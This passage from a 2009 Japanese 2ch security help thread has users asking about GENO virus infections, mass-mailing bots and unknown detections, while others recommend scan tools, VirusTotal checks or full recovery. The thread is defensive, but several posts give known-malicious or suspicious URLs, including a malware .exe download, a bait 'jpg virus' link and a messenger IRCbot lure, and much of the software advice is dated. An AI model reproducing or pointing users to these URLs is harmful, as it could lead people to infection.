O4 - HKLM\..\Run: [Persistence] C:\WINNT\system32\igfxpers.exe
O4 - HKLM\..\Run: [Adobe Reader Speed Launcher] "C:\Program Files\Adobe\Reader 9.0\Reader\Reader_sl.exe"
O4 - HKUS\.DEFAULT\..\Run: [Internat.exe] Internat.exe (User 'Default user')
O4 - HKUS\.DEFAULT\..\RunOnce: [^SetupICWDesktop] C:\Program Files\Internet Explorer\Connection Wizard\icwconn1.exe /desktop (User 'Default user')
758756sage2009/04/08(水) 13:08:09
>>735
O9 - Extra button: (no name) - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
O9 - Extra 'Tools' menuitem: Sun の Java コンソール - {08B0E5C0-4FCB-11CF-AAA5-00401C608501} - C:\Program Files\Java\jre1.6.0_04\bin\ssv.dll
O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O9 - Extra 'Tools' menuitem: Show &Related Links - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm
O16 - DPF: {6414512B-B978-451D-A0D8-FCFDF33E833C} (WUWebControl Class) - http://update.microsoft.com/windowsupdate/v6/V5Controls/en/x86/client/wuweb_site.cab?1208654512154
O23 - Service: a-squared Free Service (a2free) - Emsi Software GmbH - C:\program files\a2 free\a2service.exe
O23 - Service: AntiVir PersonalEdition Classic Scheduler (AntiVirScheduler) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: AntiVir PersonalEdition Classic Guard (AntiVirService) - Avira GmbH - C:\Program Files\Avira\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: Logical Disk Manager Administrative Service (dmadmin) - VERITAS Software Corp. - C:\WINNT\System32\dmadmin.exe
End of file
759名無しさん@お腹いっぱい。2009/04/08(水) 13:37:36
GENOのマルウェアってどこもまだ駆除できないの?
フリーセキュリティは最新のものには強いと聞いてたんだけど..
バスターやノートンとかの御三家も無理かな?
760名無しさん@お腹いっぱい。sage2009/04/08(水) 15:13:41
無理っす
761名無しさん@お腹いっぱい。sage2009/04/08(水) 15:21:02
手動でOK
762名無しさん@お腹いっぱい。sage2009/04/08(水) 15:35:47
>>756
ぱっと見、怪しいのは無いけど
Adobe Reader 9.1.0.163
Jre 1.6.0_13
が最新だから入れとけ
763名無しさん@お腹いっぱい。2009/04/08(水) 15:52:12
GENO ウイルス に一致する日本語のページ 約 42,800 件中 1 - 50 件目 (0.18 秒)
http://www.google.com/search?hl=ja&lr=lang_ja&ie=UTF-8&oe=UTF-8&q=GENO+%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9&num=50
764名無しさん@お腹いっぱい。2009/04/08(水) 15:55:17
GENO ウイルスってAdobe Readerの脆弱性をついてくると聞きました。
ですが、もしAdobe Readerをアンインストールしていた場合はどうなるのでしょうか?
765名無しさん@お腹いっぱい。sage2009/04/08(水) 15:57:16
http://pc11.2ch.net/test/read.cgi/sec/1239152979/27
766名無しさん@お腹いっぱい。sage2009/04/08(水) 16:18:37
"GENOウイルス"の検索結果 36 件中 1 - 36 件目 (0.14 秒)
767名無しさん@お腹いっぱい。2009/04/08(水) 16:25:46
GENO ウイルス ニュース検索結果
http://news.google.co.jp/news/search?um=1&ned=jp&hl=ja&q=GENO+%E3%82%A6%E3%82%A4%E3%83%AB%E3%82%B9&cf=all&scoring=n
768名無しさん@お腹いっぱい。sage2009/04/08(水) 16:41:01
先日お世話になった>>690です。その節はありがとうございました。
特に変わったことはなかったのですが念のためにリカバリしました。
スッキリしたと思っていたのですが、ユーザー/appdata/local/Temp/ose00000.exe
なるものが気になっています。これだけ2006年10月の日付になっています。
vistaでofficeパーソナルを持っていると付いてくるものなのでしょうか?

ググってみましたが、日本語の情報がなくて一般サイトはしばらく踏む勇気がないので
調べられませんでした。
769名無しさん@お腹いっぱい。sage2009/04/08(水) 17:15:51
>>768
office2007なら考えられないこともないそーですが
ご心配ならそのファイルのコピーを作って、
VirusTotalで検査してみてください
770 ◆N9P3SuvBPo sage2009/04/08(水) 17:21:23
>758
ログに感染と見られるものはないですが、一つだけ以下のエントリーをHijackThisでFIXして下さい。

>O9 - Extra button: Related - {c95fe080-8f5d-11d2-a20b-00aa003c157a} - C:\WINNT\web\related.htm

(HJTには何も無しか…とはいえ大丈夫と判断下しても良いのだろうか…)

>768
リカバリした直後なら、問題なし。
771 ◆N9P3SuvBPo sage2009/04/08(水) 17:42:11
ComboFixを奨めようかと考えていたんですが、この板のGENOウイルススレの11に
こんなカキコがあった。

>ただComboFixで自動処理するとアカウントにログイン出来なくなる
>(正規ファイルを悪玉ファイルに上書き→ComboFixが処理?)

アカウントにログイン出来なくなる
このことから、winlogon.exeあるいはuserinit.exeが改ざんされてると思われる。
再起動時のブルースクリーンのエラーメッセージさえ分かれば…
stop : c000021a Unknown Hard Error
とかならwinlogon.exeの修復を行なえば良いのだが。

あと、HJTもRSITでも見つからない
SDFixも駄目
レジストリエディタの起動も阻止
772名無しさん@お腹いっぱい。2009/04/08(水) 18:31:24
究極のセキュリティ対策


『 キャッシュをクリア(サッ 』
(やったー!カッコイイ!!!)
773名無しさん@お腹いっぱい。sage2009/04/08(水) 18:32:44
( ̄▽ ̄ ;)ハァ。。。。
774インスコマンsage2009/04/08(水) 18:55:44
>>771
>winlogon.exeあるいはuserinit.exe
それ疑って感染前のuserinit、winlogonのMD5取って
感染後と比較しても変わってなかった。

一回ComboFixで処置、再起動でログインできなくなって
回復コンソールでuserinit、kernel32.dll類を復元してみたけど
回復しなかったから別のところに問題があるのかも・・・(いまだにわからん)
775 ◆N9P3SuvBPo sage2009/04/08(水) 19:30:14
>774
そっち疑ってみたんすけど、違うみたいでしたか。
俺の環境では感染しないので分からないのだけど、ニュー速のほうで、
再起動時にブルスクになると書いてあったから、stopエラーかな?
と思ったんだがそれも違うんですよね?
776インスコマンsage2009/04/08(水) 19:54:10
>>775
>再起動時にブルスクになると書いてあったから
それ初めて知ったw
ブルスクはよくわららんですw
777インスコマンsage2009/04/08(水) 19:55:05
ちなみに自分の環境じゃGENOウイルスでブルスクになったことはまだない
778 ◆N9P3SuvBPo sage2009/04/08(水) 20:01:33
>776
ブルスクはあくまでもニュー速スレの情報ですし
(ブルスクは環境に寄りけりと言ったところか…)

ログイン出来なくなった時はどんな状態になったんですか?
779名無しさん@お腹いっぱい。sage2009/04/08(水) 20:26:47
>>769>>770
どうもありがとうございます。office2007です。
virus totalにも行ってみたところ結果は0/40(0.00%)とありました。
ただの残骸のようなので普通に削除しようかと思います。
780名無しさん@お腹いっぱい。sage2009/04/08(水) 21:02:08
            /)
           ///)
          /,.=゙''"/
   /     i f ,.r='"-‐'つ____   キャッシュ削除すりゃぁいいんだよ!!
  /      /   _,.-‐'~/⌒  ⌒\
    /   ,i   ,二ニ⊃( ●). (●)\
   /    ノ    il゙フ::::::⌒(__人__)⌒::::: \
      ,イ「ト、  ,!,!|     |r┬-|     |
     / iトヾヽ_/ィ"\      `ー'´     /
781名無しさん@お腹いっぱい。sage2009/04/08(水) 21:09:18
ブルマスク水
782インスコマンsage2009/04/09(木) 02:11:28
>>778
壁紙だけ表示されて即ユーザー選択画面へ・・・
783 ◆N9P3SuvBPo sage2009/04/09(木) 03:25:15
>>782
つまり…
起動→ようこそ画面→デスクトップの表示→ユーザー選択画面ってとこ?
強制的にログオフさせられているって感じのようですが…
それだったらログオンに関係するファイルがやられてる、としか…
でもログオン関係のファイルの修復しても復帰できなかったと言ってましたし、
原因は別だろうね。

ちなみに、俺一度こんな実験をやったことあります。
コンパネ→管理ツール→ローカルセキュリティポリシー
この中のどこかに「ローカル ログオン」というのがあって、
これを無効にして再起動したら、ログオンできなくなってしまい
リカバリーしました。
784名無しさん@お腹いっぱい。2009/04/09(木) 07:03:12
GENOウイルスの専門掲示板建てました
情報提供にご協力願います。


GENOウイルス被害者の会
http://yy701.60.kg/genovirus/
785名無しさん@お腹いっぱい。2009/04/09(木) 07:12:59
ボットに感染してるかどうか
サイバークリーンってとこの駆除ツールを実行してみた方がいいんですかね?
OCNからの定期メールで やってみな みたいなこと書いてあったんですが・・・
786名無しさん@お腹いっぱい。sage2009/04/09(木) 07:53:37
そこはバスター、ゾンビがいるぞw
787名無しさん@お腹いっぱい。sage2009/04/09(木) 08:24:32
>>786
ゾンビ?
やらない方がいいんですか?
788名無しさん@お腹いっぱい。sage2009/04/09(木) 08:41:57
>>785
HDD内の全ファイル名をテキスト化して
つこうたで定評のあるIPAに送信する愉快なツールだぞ、あれは
789名無しさん@お腹いっぱい。sage2009/04/09(木) 09:49:24
>>788
まじっすか?
ここで聞いといてよかったです
790名無しさん@お腹いっぱい。sage2009/04/09(木) 10:27:30
GENOウイルスやべえな
791名無しさん@お腹いっぱい。2009/04/09(木) 12:29:43
【0.1】ネットショップ「GENO」等でウイルス感染 業務再開するもGENOサイドは「キャッシュ消せ」とふざけた対応★11
http://tsushima.2ch.net/test/read.cgi/news/1239241638/
792名無しさん@お腹いっぱい。sage2009/04/09(木) 15:10:41
【使用OS】 「XPProSP3」
【Microsoft Update(MU)の状態】 「つながりません」
【使用セキュリティソフトとバージョン】 「Norton Internet Security 2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「はい」
【スパイウェア対策ソフト】 「Ad-Aware SE」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「はい」
【ルータの有無】 「なし」

どうやらウィルスに感染してしまったようでPCを立ち上げたとき、または一定時間ごとに、
メールを大量に送付してしまいます。

ウィルススキャンをして感染ファイルを削除したため今は収まっていますが、
当初はservices.exeが終了して再起動してしまいました。

今はウィルスは検出されていませんがレジストリが改変されてしまったようで、
メールを大量に送付し続けています。(メールはプロバイダがブロックして送信されていないようです。)

対策をご存知の方がいらっしゃいましたら宜しくお願いします。
793八頭 ◆YAGApwSaEw sage2009/04/09(木) 16:45:07
>>792
DDS
ttp://www.forospyware.com/sUBs/dds

dds.scr(MS-DOS アプリケーション)をデスクトップにダウンロード
DDSを実行・・・
DDSによるログ抽出が済むまで操作はありません ttp://i39.tinypic.com/slqvly.jpg
ログ抽出走査が完了すると「DDS - How to post the logs(投稿時の注意点)」のダイアログ表示はOKで閉じます
自動的にDDS.txt とAttach.txt の2つがメモ帳で開くので、
ファイル(F)→「名前を付けて保存(A)」でそれぞれのログを保存しておく。(*テキスト名は変更しない)

OTViewIt
ttp://oldtimer.geekstogo.com/OTViewIt.exe

OTViewIt.exeをデスクトップへダウンロード
OTViewItを実行
「Scan All Users」の箇所にチェックを入れてから、「Run Scan」をクリック
ログ抽出走査が終了すると、
「OTViewIt.txt」と「Extra.txt」がメモ帳で表示されて、デスクトップ上にテキストが自動的に保存されています

これらのログテキストを新規フォルダへコピー&貼り付けしてから→フォルダを圧縮
Upload a suspected infected fileへ、[ Report ] - Infection log report (Massmail bot infection. )  として送信
http://pc11.2ch.net/test/read.cgi/sec/1239086455/9 の中段
794 ◆N9P3SuvBPo sage2009/04/09(木) 17:05:32
>792
リカバリしてください。
そっちのほうが手間掛からずに済みます。
795名無しさん@お腹いっぱい。sage2009/04/09(木) 18:36:11
ファイルに感染するたびにウイルス自体をランダムな
暗号化コードで暗号化するポリモーフィック型の不正プログラム
「PE_VIRUX(バイラックス)」の流通が確認されたと報告。
「PE_VIRUX」は、正規ファイル(exeファイルやscrファイル)に
感染する際に、自身のコードを追加する場所や暗号化の方式・回数を
ランダムに変更するため駆除が困難

ポリモーフィック型って複号化するロジック部分を検出すれば見つかるって
聞いたけど無理なの?
メタモーフィック型なら無理な気がするけど
796八頭 ◆YAGApwSaEw sage2009/04/09(木) 18:52:52
>>792
[ Report ]の提出が完了したら、オートラン設定を確認する
@・IPA 情報処理推進機構
 ●「外部記憶メディアのセキュリティ対策を再確認しよう!」 USB メモリの利用における対策
ttp://www.ipa.go.jp/security/txt/2008/12outline.html
A・使用しているソフトウェアやWebプラグイン類の最新版Updateとセキュリティ設定を常に心掛けましょう
 (*解凍ソフト、動画Player、Adobe Reader用パッチ、Mailソフト、Officeソフト、Sun MicrosystemsのJavaなど)
B「Ad-Aware SE」 は保護機能を解除してから、「プログラムの追加と削除」からアンインストールして、
次の3つとも装備すること
http://pc11.2ch.net/test/read.cgi/sec/1239086455/8
・「a-squared Free 4.0」
・「Malwarebytes' Anti-Malware 1.35」
・「Avira AntiVir Personal - FREE Antivirus, Version 8
797名無しさん@お腹いっぱい。sage2009/04/09(木) 20:19:04
>>792
ウイルス名もわからない様ではどうにも…
そんな状態のPCはネットにつないではいけない。
漏れも駆除するよりリカバリに一票。
それから、Ad-Aware SEは3月31日で定義ファイルの提供が終了してます。
Lavasoftソフトを使うならAd-Aware AE(デフォルトで日本語有り)に。
798名無しさん@お腹いっぱい。2009/04/12(日) 03:06:19
Kido.ih
に感染しました
msと主なセキュリティサイトに繋がりません
799名無しさん@お腹いっぱい。sage2009/04/12(日) 03:11:00
>>798
>>1★質問用テンプレ★
800名無しさん@お腹いっぱい。sage2009/04/12(日) 04:01:23
>>792
リカバリしたくないのであればさらにspybot,clamなどを推奨。非常駐で使えるものは全て使ってみて下さい。
全て試して全く引っかからないか、引っかかってもあまりにも多ければリカバリしましょう。
駆除できてもパソコンの性能はガクンと落ちてしまいます。
801名無しさん@お腹いっぱい。sage2009/04/12(日) 04:16:32
いまどきAd-AwareとかSpybotとかClamなんて
アメリカ人でも使ってないからw
802名無しさん@お腹いっぱい。sage2009/04/12(日) 05:50:47
>>800
俺は使ったことないから分からないな・・

>>801
何使ってる?おすすめあったら教えて
803名無しさん@お腹いっぱい。2009/04/13(月) 00:50:50
手動削除中なのだが

l.cmd

コレってウィルス? 純粋なシステムファイル?
ググッてもヤフーでググってもいまいちピンとこないんで…
804名無しさん@お腹いっぱい。sage2009/04/13(月) 08:22:12
ランダムなファイル名の奴がごろごろしているのに
ファイル名だけでわかるかボケ
バッチだからメモ帳あたりで開いて読んで判断しろ
805名無しさん@お腹いっぱい。2009/04/14(火) 01:44:02
こっちで質問するようすすめられた。
マルチじゃないのでよろしく

勘違いかもしれないけど国民新党のホームページ乗っ取られたの?
さっきあちこちの政党のホームページ見てたんだけど国民新党のホームページ開いたらfirefoxが強制終了した。
不思議に思ってもう一回開いたらやっぱり強制終了。

不安になったのでパソコンのウィルスチェック、問題なし・・
aguse gatewayでhttp://www.kokumin.or.jp/opinion/を調査、問題なし・・
一体何故なのか分からない。ちなみに他のページ見たりするのには何の問題もない
不審なソフトの動きもない

勘違いかもしれないけどもしそういう情報があったら教えて。長レスしてスマソ
806名無しさん@お腹いっぱい。2009/04/14(火) 03:10:41
質問です
あるサイトでファイルをダウンロードしていたら、いきなりポップアップ画面で
「あなたも○○(自宅の住所。ローマ字で)に住んでるんでしょ?」
とか出てきました。
なぜ住所がばれたのでしょうか? ウイルスですか?
ダウンロードしたファイルをウイルス検索しても、何も引っかかりませんでした
よかったらご教示ください
807名無しさん@お腹いっぱい。2009/04/14(火) 05:49:09
>>806
IPからどこら辺に住んでるかとかは分かるよ?でも東京とか大阪とか大雑把にしか分からんでしょ?

アクセス情報【使用中のIPアドレス確認】
ttp://www.cman.jp/network/support/go_access.cgi

あとどのサイトか言ってくれなきゃ答えるにも難しい。
住所ってどのくらい正確に出てきたの?
808名無しさん@お腹いっぱい。sage2009/04/14(火) 08:16:15
ただのメッセンジャスパムだったりしてな
809名無しさん@お腹いっぱい。2009/04/14(火) 12:51:58
>>807
説明が足りなくてすいません
「同人こっとん」という同人誌のサイトです
「〜市」まで(出てきたのは市のみです)特定されていました
ごく最近パソコンをリカバリして、ウイルスとかにはやられてないと思うのですが……
810名無しさん@お腹いっぱい。sage2009/04/14(火) 13:17:35
>>809
使ってるブラウザは何?あとポップアップは表示しないように設定してる?

aguse gatewayでググってそこにそのサイトのURLぶちこんで調査、そこで問題なければ大丈夫なはず。

あとそんなに気にするほどでもないと思う。807で述べた通り基本的にIPはどこら辺に住んでるかの情報を含む。
住んでいる番地まで出たのなら話は別だが市町村程度までならそんなもん。
心配ならPG2でも導入すべし。

便利なIPフィルタソフト、PeerGuardian2
http://ex24.2ch.net/test/read.cgi/pc2nanmin/1239572745/

どうしても心配ならもう一回わざと表示させて、その画面をプリントスクリーンでコピー、画像に貼ってどっかにアップしてみて。
それが一番確実。レスだけでは憶測でしか判断できん。
811名無しさん@お腹いっぱい。2009/04/14(火) 16:09:37
>>810
ありがとうございます
当のサイトをaguse Gatewayで見ようとしたのですが、
「画像を取得できませんでした」
というのがどのサイトを入力しても出ます
そのメッセージでぐぐってもヒットしないので、よかったら本来はどう表示されるのかを教えてもらえないでしょうか

まず、「ウェブ」で調べたところ、メインページを含めて色は変わりませんでしたが、
「ゲートウェイ」で例のポップアップ画面が出るページを張ったら色が紫になりました
こういう場合、そのサイトにいるだけでも危険ですか?
無知で申し訳ありませんが、もう少しお付き合いいただけるとうれしいです
812名無しさん@お腹いっぱい。sage2009/04/14(火) 16:38:12
>>811
安全なら緑、危険なら紫になる

一応あんたの言うページ調べたけど特に問題はないはず。入る前に幾つかのソフトで何重にもかけて調べたが問題なし
ページ情報にも悪意のあるもんは見当たらなかった。

ただ気になるのはそのポップアップ画面には一度も出くわさなかった。
firefoxでポップアップウィンドウブロックをしてるからだろうが自分から外すわけにはいかん。
手間をかけるがそのポップアップ画面が出るページのURL貼ってくれ
(みんなに迷惑かけないようポップアップ画面が出るページのURLと明示して貼ってくれ)


あといるだけで危険かと言うと、その発想には指摘すべきことがある。
そもそも今も昔もセキュリティソフトとかはパソコンに侵入されたら意外と脆いものなのだよ。

もちろん最近では少しなら侵入されても対応できるようになってるが、それ以前に侵入させないことが一番重要なわけ。
だから危険なページにいるいないじゃなくて入る前に危険かどうか判断できることが大事になるわけよ
仮に開いてしまってもページ情報を読み込ませず遮断するよう設定しておくことは必須。usercash系なんかがいい例

さっき教えたaguse gateway、これ使えばかならの割合で危険サイト回避できるし、最近のアンチウィルスソフトなら
グーグル検索の段階で危険かどうかレベル分けして表示されるはず。そういうのを利用して最初から入らないのが正しい使い方になる
aguse gatewayを教えたのもそういう対策があるよってこと

つまり危険サイトに一度はいったらすぐ出ようとずっと居座ろうとあんまり変わらん。もちろん一刻も早く出るにこしたことはないが
本当に悪意のあるサイトだったら入った時点でアウト。

ただあんんたのいうサイトはそのポップアップ画面が出るページのURL?踏まなきゃ平気だと思う。
さっきも言ったがとりあえずそのポップアップ画面が出るページのURL貼ってみて
813名無しさん@お腹いっぱい。2009/04/14(火) 16:54:15
いろいろとありがとうございます 助かります

ポップアップが出るURLです
ttp://errors.servik.com/denied.htm

数秒待つと、下のほうに出てきます
ご迷惑をおかけしますが、よろしくお願いします
814名無しさん@お腹いっぱい。sage2009/04/14(火) 20:19:19
>>813アドレスでぐぐったらでてきた参考になるかは?

勇気が無くて見れない画像解説スレin半角Part526
284 :/名無しさん[1-30].jpg:2007/09/24(月) 20:54:50 ID:sPWYzFuB0
errors.servik.com/denied.htm
おねがい

288 :/名無しさん[1-30].jpg:2007/09/24(月) 21:42:19 ID:SQVwd+m+0
>>284
つまりはアダルトサイトの様です
その先は自己責任で

307 :(コテハン):2007/09/24(月) 23:32:52 ID:CJiqs2MF0
>>284
Error - Site cannot be accessed などと表示されリンクがあり
リンク先は McAfee SiteAdvisor で微妙な判定の海外の出会い系サイトに逝きます
漏れの環境ではそこまではPC無害ですが一応注意

815名無しさん@お腹いっぱい。2009/04/14(火) 23:43:33
>>814
確かにぐぐると出てきますね
ポップアップの画面さえクリックしなかったら大丈夫だと信じます
あと、あまり行かないようにしますね
ありがとうございました
816名無しさん@お腹いっぱい。2009/04/15(水) 02:23:16
質問です。

公務員志望で,公務員予備校の資料を複数の学校からweb上で取り寄せたのですが
請求したところの資料が到着してから数日後に,資料請求してない予備校からも学校案内が届きました。

これはウィルスなどの影響でしょうか。それとも個人情報漏えいされているのでしょうか。
いずれにせよ詳しくその仕組みを教えていただければ幸いです。
817名無しさん@お腹いっぱい。2009/04/15(水) 04:50:10
うぉお・・・

ウィルスのせいでVistaから
「お前のコンピューター、正規品じゃねーぞカス」
「もうぜってー起動してやんねーw」
とか警告が・・・orz
818名無しさん@お腹いっぱい。sage2009/04/15(水) 05:07:23
>>816
今のご時世お互いに潰しあってる場合じゃない。予備校とて同じ。一つの予備校に資料請求すれば他の予備校にも情報が伝わる。
資料請求する場合はそういうことよくある。個人情報は漏洩しませんって言っても結局は業界団体にデータとして伝わるし

どうしても気になるなら資料請求したところに電話してみな。どうにかなるわけではないが一応迷惑だって意思を伝えるのは大事なこと
819名無しさん@お腹いっぱい。sage2009/04/15(水) 05:29:07
>>813
ブラウザは火狐にすべし。
2.0の頃は重かったが3.0あかなり使いやすい。
ポップ対策にも優れている
820名無しさん@お腹いっぱい。sage2009/04/15(水) 05:45:33
>>815
それはポップアップというより広告
Adblock Plusをfirefoxで使えばいい
821名無しさん@お腹いっぱい。2009/04/17(金) 15:55:33
【使用OS】     XP SP3
【PCスペック】    HP compaq nx9030 メモリ1.2G
【セキュリティソフトと年式】     ウィルスバスター2009

ウィルスバスター2009の履歴を見たところPAC_Generic 001が発見され削除されていました。
webメール検索が発見され自動で削除されていました。

発見されたところを見ると
ttp://bosamedia.org/getfile/Chaos.Queen.Ryoko.Scenario.4.exeとなっていました。
実に覚えが無いので恐らくインターネットを見てる時、どこか間違えてはいったのかもしれません。

このPAC_Generic 001をgoogleで検索したところ情報が4件しかなく情報がありませんでした。
このPAC_Generic 001とはどのようなものなのでしょうか?
お分かりの方、教えて下さい。

822名無しさん@お腹いっぱい。sage2009/04/17(金) 15:58:55
>>821
PAC_Generic 001?何だそりゃ?

こっちで聞いたら?
↓↓↓
セキュリティ初心者質問スレッドpart118
http://pc11.2ch.net/test/read.cgi/sec/1238849850/
823名無しさん@お腹いっぱい。sage2009/04/17(金) 17:22:17
>>821
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=Pak_Generic.001

ちなみにそのアドレスは有害。
824名無しさん@お腹いっぱい。sage2009/04/17(金) 17:25:09
>>821-823
http://pc11.2ch.net/test/read.cgi/sec/1238849850/281-284
825名無しさん@お腹いっぱい。sage2009/04/17(金) 18:39:18
>>823
一体いつそのアドレスに行ったのか全く分かりません・・
フリーソフトを探している時にどこかと間違えたのかもしれませんが・・
ちなみにどうやってそのアドレスが危険と分かったのでしょうか?
初心者ですいません

>>824
私も見てみました。破壊活動の有無がないというのは一応削除できたので大丈夫ということなのでしょうか・・
8268212009/04/17(金) 18:50:15
すいません。821=825です。
書き忘れて申し訳ありませんでした。
827名無しさん@お腹いっぱい。sage2009/04/17(金) 18:50:55
>>821
そこから拾ったファイルをVirustotalスキャン

http://www.virustotal.com/analisis/0b3f4ecbdc630090ddbd52c026066d7f
黒ですね・・・

NortonSafeWebのレポート
http://safeweb.norton.com/report/show?url=bosamedia.org
828821sage2009/04/17(金) 19:02:21
>>827
拾ったファイル?最近ダウンロードしたものはほぼないはずですが・・
やはりフリーソフト探している時に偽者掴まされたのかもしれません。
わざわざありがとうございました。

あとそのURLは安全でしたか?自分の質問のせいで答えてくれた方が被害にあってしまっては立つ瀬がないので・・
アクセスした瞬間感染とかするURLでしたか?
829827sage2009/04/17(金) 19:07:21
>>828
>アクセスした瞬間感染とかするURLでしたか?

とりあえず仮想環境で実験してみての結果、exeファイルをDLするページでアクセスした瞬間感染とかはない模様
あとVirustotalの結果一覧で821のファイルを検出できるベンダーはサイト開いた瞬間にブロックしてくれるのでご安心を
830821sage2009/04/17(金) 19:34:10
>>829
そうですか。質問した後に自分のせいで感染者が出たらどうしようと心配していたので良かったです。
Virustotal、私も使っていこうと思います。教えてくれてありがとうございました。
831名無しさん@お腹いっぱい。2009/04/20(月) 20:59:06
知り合いのメッセから変なURLが送られてきた
ttp://img*****.PhotoChekker.com/?user=
****は乱数くさい。user=以降は相手のメッセID、DSCから始まるカメラ画像っぽいファイルとなる
どうやら懐かしいIRCbotの亜種らしい
とりあえず面白半分で、捨てPC使って踏んでみたんだが感染してないっぽい?
少なくとも、レジストリに変な値が増えてるようなことはない
google先生に聞いたら日本語ではこれしか引っかからなかった
http://detail.chiebukuro.yahoo.co.jp/qa/question_detail/q1325346163

潜伏先とか分かる人求む。どうやらメッセを最新にしてると感染しないくさいけど
832名無しさん@お腹いっぱい。2009/04/21(火) 02:30:01
質問です!
sandboxieでブラウザ動かしたらウィルス感染とかって起きないんじゃないでしょうか?
終わったら仮想領域空っぽにすれば問題ないんじゃないですか?
833名無しさん@お腹いっぱい。2009/04/21(火) 16:32:46
質問です
某スレで「_MACOSX .DSstore」とググって最初にヒットするサイトを見ろといわれ
URLをクリックしたらIEのタブが無限に増え続けてPCがフリーズしました
強制再起動かけたのですが、ウイルスに感染したのでしょうか?
OSはXPでavastは最新の状態です
URLを踏んだブラウザはスレイプニールですが、サイトを閉じたらIEが起動しました
834名無しさん@お腹いっぱい。sage2009/04/21(火) 16:49:48
>>833
某スレってどこ?それを最初に言わなきゃ?XPはSP3にしてる?IEはIE8?
FireFoxでアドオンNoscriptいれてればそういうのは防げるよ。
上のことやって、用心のためAguse Gatewayってサイト通してチェックしな、それで全て分かる。
835 ◆N9P3SuvBPo sage2009/04/21(火) 19:36:21
>833
>「_MACOSX .DSstore」とググって最初にヒットするサイトを見ろといわれ
自分も試してみましたが、IEが沢山開くことや、PCがフリーズすることはありませんでした。

ただのブラクラなので…
ブラウザの設定だけで回避可能&XPSP3とかIE7とかIE8とか全然関係なし
836名無しさん@お腹いっぱい。sage2009/04/21(火) 20:20:18
Fire「F」oxなんて書くアホはスルーで
837名無しさん@お腹いっぱい。sage2009/04/22(水) 10:56:04
これはjpgウイルスですか?
windowsを最新の状態にしておけば感染しないのでしょうか?
ttp://image.i-bbs.sijex.net/bbs/jk/1240316988578m.jpg
838名無しさん@お腹いっぱい。sage2009/04/22(水) 13:53:15
そういいつつ、それを貼るやつ
839名無しさん@お腹いっぱい。sage2009/04/23(木) 13:43:58
>>837
ウイルスリンク貼ったので、おまえを通報しますた
840名無しさん@お腹いっぱい。sage2009/04/25(土) 05:25:10
【使用OS】 「WindowsXP」
【Microsoft Update(MU)の状態】 「最新」
【使用セキュリティソフトとバージョン】 「カスペルスキーインターネットセキュリティ2009」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「Yes」
【スパイウェア対策ソフト】 「カスペの機能+Adaware」
【スパイウェア対策ソフトの更新は定期的に行なっているか】 「Yes」
【ルータの有無】 「あり」

【スキャンの結果何が検出されたか(検出されたウイルス名・ファイル名を(パスを含めて)詳しく)】
「MultiPacked.Multi.Generic」

ググっても日本語のページが無く、よく判りません…。
xfireというゲーマー用のツール&ページがあるのですが、そこでリアルタイム配信を見る為に
配信URLを開いたら、悪意の含まれるプログラムと言い上記の MultiPacked.Multi.Generic というものが
マルウェア?としてひっかかります。
駆除をしてみるのですが、駆除できないようです。
ログには以下のように出ています。

C:\DOCUMENTS AND SETTINGS\ユーザー名\LOCAL SETTINGS\APPLICATION DATA\DYYNO RECEIVER\dyyno.qtl/Edit
Dyyno P2P Receiver Application
駆除できません: MultiPacked.Multi.Generic
処理をスキップしました

DYYNOというのは、配信を見る為に必要なプラグインです。

むしろ、このプラグインがやばいのでしょうか…
MultiPacked.Multi.Genericとは何者なのでしょうか。

どうぞよろしくお願いします。

841名無しさん@お腹いっぱい。sage2009/04/25(土) 06:17:56
>>840
Genericなら
疑わしい段階でマルウエアとして確認されたわけではない。
virustotalでほかのベンダーが検出しているか調べるとか、
http://www.kaspersky.co.jp/の最下部「新しいウイルスをお知らせください」
から検体を送るとかすると良いかと。

暫定的に安全性は落ちるがプロアクティブディフェンス切っておけば?
842名無しさん@お腹いっぱい。2009/04/26(日) 04:46:22
カスペルスのオンラインスキャンを試したところ、
jane styleのログが感染の疑いありと判断されました。
この場合、スレ一覧からログ削除を選択すれば解決するのでしょうか?
843名無しさん@お腹いっぱい。sage2009/04/26(日) 04:49:11
>>842
こっちで聞け

セキュリティ初心者質問スレッドpart118
http://pc11.2ch.net/test/read.cgi/sec/1238849850/
844名無しさん@お腹いっぱい。2009/04/27(月) 22:57:27
確かbitdefenderだったと思うんですが、
Knoppixみたいに、1CDでWindows立ち上げずに
ウィルススキャンするのがあったと思うんですが
どこでしょうか?フリーじゃなかったですかね?
845名無しさん@お腹いっぱい。sage2009/04/27(月) 23:00:12
BitDefender
AntiVir
Avast
AVG
F-PROT
どれでもできるよ
846名無しさん@お腹いっぱい。sage2009/04/27(月) 23:07:58
>>845
そのbootdiscがどこにあるか知りたかったのですが・・・
調べてたらUltimate Boot CDというのを見つけたので使ってみます。
ただウィルス定義が古そうですが。。
847名無しさん@お腹いっぱい。sage2009/04/27(月) 23:24:16
たびたびすんません、bootdiskである必要がありませんでした。
XPをセーフモードで立ち上げる場面で
「コマンドライン」にすれば、CD上のDOSスキャナでスキャン出来ますよね。
DOSスキャナを焼いてみます。
848名無しさん@お腹いっぱい。sage2009/04/27(月) 23:38:20
コマンドライン版とか使えばお手軽だね
849名無しさん@お腹いっぱい。2009/04/28(火) 17:25:05
【使用OS】 「XPHOMESP3」
【Microsoft Update(MU)の状態】 「基本的に最新(IEは6)」
【使用セキュリティソフトとバージョン】 「ノートンインターネットセキュリティ2008」
【セキュリティソフトの定義ファイルは最新の状態に更新されているか】 「yes」
【ルータの有無】 「yes」

ここ数日、PF使用量とieのメモリ使用量が増大します。
普段ならPC起動時350程度のPF使用量。ネットを数時間やっても800~1GB程度です。またieの使用メモリ量もそれほ
ど多くありません。ですが、ここ数日ieを起動して数クリック移動しただけでPFが1GBを超え、さらに使い続けると1時間も使用してない

にもかかわらず、PFが2GB以上行きます。ieの使用メモリ量もありえない量に増大しており
